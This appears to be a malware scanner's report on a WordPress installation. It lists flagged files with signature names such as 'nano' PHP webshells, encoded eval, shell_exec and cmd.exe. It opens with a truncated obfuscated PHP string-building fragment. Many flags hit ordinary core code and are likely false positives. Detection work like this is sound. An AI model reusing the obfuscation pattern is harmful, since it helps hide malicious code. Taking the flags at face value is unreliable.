$O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O0...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/class-pclzip.php Size: 191.21 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2780 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3702 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3948 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5677 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/class-wp-filesystem-direct.php Size: 11.52 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group($file) { $gid = @filegroup($file); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $this->exists($destination) ) return false; $r...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 15.21 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid($owneruid); return $ownerarray['name']; } public function getchmod($file) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group($file) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) return false; if ( ! function_exists('posix_getgrgid') ) return $gid; $grouparray = posix_getgrgid($gid); return $grouparray['name']; } public function copy($source, $destination, $overwrite = false, $mode = false) { if ( ! $overwrite && $thi...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/file.php Size: 50.86 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 244 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $overrides['upload_error_handler'](&$file, $message )
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-admin/includes/ms.php Size: 38.05 kB Created: 2019-03-18 00:32:14 Modified: 2019-03-18 00:32:14 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 620 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-content/plugins/cpaddons-site-software.php Size: 1.58 kB Created: 2019-03-18 00:32:15 Modified: 2019-03-18 00:32:15 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '$a', "return null;" ) ); add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) )
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/ID3/module.audio-video.quicktime.php Size: 115.99 kB Created: 2019-03-18 00:32:15 Modified: 2019-03-18 00:32:15 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 1560 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/SimplePie/Parse/Date.php Size: 19.24 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 787 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $day . $fws . $month . $fws . $year . $fws .
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/Text/Diff.php Size: 12.65 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/Text/Diff/Engine/native.php Size: 15.47 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/Text/Diff/Engine/shell.php Size: 5.05 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 2
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/atomlib.php Size: 11.09 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$k,$v', 'return "$k=\"$v\"";'); $this->map_xmlns_func = create_function('$p,$n', '$xd = "xmlns"; if(strlen($n[0])>0) $xd .= ":{$n[0]}"; return "{$xd}=\"{$n[1]}\"";'); } public function AtomParser() { self::__construct(); } function _p($msg) { if($this->debug) { print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n"; } } function error_handler($log_level, $log_text, $error_file, $error_line) { $this->error = $log_text; } function parse() { set_error_handler(array(&$this...
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/class-phpmailer.php Size: 143.34 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Dangers: 1
| Description | Match |
|---|
Sign a408f408 Line: 1454 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/class-requests.php Size: 29.09 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $transport[$cap_string]()
|
|
/custdata02/turtle/.cpaddons_upgrade/wp-includes/class-snoopy.php Size: 36.90 kB Created: 2019-03-18 00:32:16 Modified: 2019-03-18 00:32:16 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec( $this->curl_path . ' ' . $cmdline_params . ' ' . escapeshellarg( $URI ), $results, $return ); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentHeader])) { pre...
|
|